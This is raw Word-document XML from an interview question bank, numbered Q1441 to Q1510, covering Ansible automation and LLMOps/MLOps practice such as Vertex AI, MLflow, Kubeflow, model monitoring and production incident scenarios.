        <w:t>Q1441. Ansible error handling: How do you handle partial failures in a multi-host Ansible run so one bad host doesn't block the rest of the fleet?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1442. Ansible Jinja2 templating: How would you use Jinja2 templates in Ansible to generate environment-specific configuration files safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1443. Ansible Tower/AWX: What does Ansible Tower or AWX add on top of plain ansible-playbook for enterprise teams, such as RBAC, scheduling, and audit logging?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1444. Ansible OS patching: How would you design a safe, automated OS patching workflow with Ansible that includes health checks, rolling batches, and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1445. Ansible linting: How would you enforce Ansible code quality using ansible-lint, pre-commit hooks, and code review before merging playbook changes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1446. Ansible secrets in CI/CD: How would you securely supply an Ansible Vault password or SSH key to a CI/CD pipeline without hardcoding it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1447. Ansible multi-cloud: You delivered Ansible IaC across GCP, AWS, and Azure. What did you handle differently for authentication and modules across the three clouds?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1448. Ansible with Kubernetes: When would you still use Ansible in a Kubernetes-centric platform, for example bootstrapping nodes or managing non-containerized infrastructure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1449. Ansible change management: How would you gate risky Ansible changes, like a fleet-wide restart, behind approvals while keeping routine changes fast?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1450. Ansible architecture: Explain the components of Ansible architecture, including the control node, managed nodes, and how they communicate.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1451. Ansible push vs pull: What is the difference between a push-based and a pull-based configuration management model, and where does Ansible fit?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1452. Ansible inventory basics: What is an Ansible inventory file, and what does it typically contain?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1453. Ansible playbooks basics: What are Ansible playbooks, and what does their basic structure look like?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1454. Ansible roles basics: What are roles in Ansible, and why would you use them instead of one large playbook?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1455. Ansible modules basics: What are Ansible modules, and how do they differ from running a raw shell command?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1456. Ansible connectivity: How does Ansible connect to and execute commands on remote machines?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1457. YAML basics: What is YAML, and why is it used as the configuration language for Ansible?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1458. Scenario - partial playbook failure: An Ansible playbook fails on host 40 of 200 mid-rollout, leaving the fleet in mixed state. How do you recover safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1459. Scenario - vaulted secret rotation: You need to rotate a secret stored in Ansible Vault across all environments without causing a mid-day outage. How do you plan it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1460. Prompt lifecycle management: How would you version, test, review, and roll back prompt changes the same way you would application code?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1461. LLM latency debugging: A chat feature has high p95 latency. How would you separate model inference time, retrieval time, network hops, and streaming/rendering delays?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1462. Model routing and fallback: How would you design fallback between a primary and secondary LLM provider or model when the primary times out, rate-limits, or returns low-confidence output?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1463. Streaming inference infra: How would you design backend infrastructure for streaming LLM responses over GKE/Cloud Run, including timeouts, load balancing, and client reconnects?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1464. GPU serving cost: How would you decide between managed model endpoints, self-hosted GPU serving with vLLM/TGI, and batch inference for different GenAI workloads on cost and latency?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1465. PII and data handling: How would you prevent PII and secrets from leaking into LLM prompts, logs, third-party model providers, and evaluation datasets?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1466. Vertex AI Agent Builder: How would you operate a production Vertex AI Agent Builder or Model Garden deployment, including versioning, monitoring, and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1467. Vertex AI platform design: How would you design a production ML platform on Vertex AI for training, registry, deployment, monitoring, IAM, and cost control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1468. Vertex AI custom training: A training job works locally but fails on Vertex AI. How would you debug packaging, container image, service account, data access, and logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1469. Vertex AI endpoint latency: A deployed model endpoint has high p95 latency after traffic increases. How would you troubleshoot autoscaling, machine type, model load time, request payloads, and downstream dependencies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1470. Vertex AI model registry: How would you use Vertex AI Model Registry to manage versions, aliases, lineage, approvals, rollback, and auditability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1471. Vertex AI batch prediction: When would you choose Vertex AI batch prediction over online endpoints, Dataflow, Cloud Run jobs, or GKE jobs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1472. Vertex AI Feature Store: How would you design feature freshness, offline/online consistency, access control, lineage, and monitoring for a feature store on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1473. Vertex AI model monitoring: What would you monitor for skew, drift, attribution drift, data quality, prediction quality, and alert fatigue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1474. Vertex AI CI/CD: How would you build a CI/CD pipeline that packages training code, compiles pipelines, runs evaluation gates, registers models, and promotes deployments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1475. Vertex AI security: How would you secure Vertex AI workloads using least-privilege IAM, service accounts, VPC-SC, private networking, CMEK, and audit logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1476. Vertex AI cost optimization: A Vertex AI project has rising training and prediction costs. How would you analyze spend and reduce waste without hurting model quality?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1477. MLflow reproducibility: What exactly would you log in MLflow so another engineer can reproduce a model months later?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1478. MLflow artifact storage: How would you design MLflow tracking server, backend store, artifact store, access control, backup, and retention in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1479. MLflow CI/CD integration: How would you integrate MLflow with GitHub Actions, Jenkins, or Cloud Build for automated training, evaluation, registration, and deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1480. MLflow vs Vertex AI: When would you choose MLflow, Vertex AI Experiments/Model Registry, or use both together in a GCP MLOps platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1481. MLflow model serving: How would you deploy an MLflow model for real-time inference using Docker, FastAPI, Kubernetes, KServe, or a managed endpoint?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1482. MLflow governance: How would you enforce model ownership, approval gates, lineage, security scanning, and compliance evidence using MLflow metadata?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1483. Kubeflow components: How would you package pipeline components as containers, pass artifacts/parameters between steps, and keep them reusable across teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1484. Kubeflow distributed training: How would you run distributed TensorFlow or PyTorch training on Kubeflow with GPUs, node pools, retries, and checkpointing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1485. Kubeflow Katib: When would you use Katib for hyperparameter tuning, and how would you control search cost, parallel trials, metrics, and early stopping?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1486. Kubeflow model serving: How would you serve models from Kubeflow using KServe, canary releases, autoscaling, GPU support, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1487. Kubeflow CI/CD: How would you integrate Kubeflow Pipelines with GitHub Actions, Jenkins, Cloud Build, ArgoCD, or GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1488. MLOps architecture: How would you design an end-to-end production MLOps platform from data ingestion to monitoring and retraining?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1489. MLOps lifecycle ownership: Where do data scientists, ML engineers, platform engineers, SREs, and security teams own different parts of the model lifecycle?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1490. MLOps CI/CD/CT: How would you design continuous integration, continuous delivery, and continuous training for ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1491. MLOps data validation: What data quality, schema, freshness, and anomaly checks would you add before training or inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1492. MLOps model evaluation gates: What offline, online, business, fairness, latency, and reliability gates should a model pass before production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1493. MLOps monitoring strategy: How would you monitor model quality, data drift, concept drift, latency, errors, feature freshness, and business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1494. MLOps retraining strategy: How would you decide between scheduled retraining, trigger-based retraining, manual retraining, and champion-challenger updates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1495. MLOps incident response: A production model starts giving bad predictions but infrastructure metrics look healthy. How would you investigate and mitigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1496. MLOps governance: How would you make models reproducible, auditable, explainable, secure, and compliant across teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1497. MLOps cost and reliability: How would you balance GPU cost, batch vs online serving, autoscaling, SLOs, and rollback for production ML workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1498. MLOps situation - bad model release: A new model version passed offline tests but hurts business KPIs after deployment. What do you do in the first hour?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1499. MLOps situation - data pipeline delay: Training data is delayed by six hours and a retraining job is about to run. How do you decide whether to proceed, skip, or use older data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1500. MLOps situation - silent schema change: An upstream team changed a column meaning without changing its name. How would you detect, mitigate, and prevent this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1501. MLOps situation - feature drift alert: Drift monitoring fires during a holiday sale, but revenue is up. How do you avoid a false incident while still protecting the model?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1502. MLOps situation - model serving outage: A model endpoint returns 5xx errors after scaling from 5 to 50 replicas. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1503. MLOps situation - GPU quota shortage: A critical training job cannot start because GPU quota is exhausted. What immediate and long-term actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1504. MLOps situation - model artifact corruption: The registry points to a model artifact that cannot be loaded in production. How do you recover and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1505. MLOps situation - rollback conflict: Product wants to keep a faster model, but risk wants rollback because accuracy dropped. How do you lead the decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1506. MLOps situation - missing ground truth: The business asks for model accuracy monitoring, but labels arrive after 30 days. What proxy signals and workflow would you design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1507. MLOps situation - training-serving skew: Offline validation is strong, but online predictions are poor. How would you prove or rule out training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1508. MLOps situation - PII leak risk: You discover raw customer data may be logged in model training or inference logs. What is your response plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1509. MLOps situation - expensive experiment culture: Data scientists are launching many large training jobs without cost ownership. How would you introduce guardrails without blocking innovation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1510. MLOps situation - notebook to production: A data scientist has a high-performing notebook model. How do you turn it into a reliable production pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
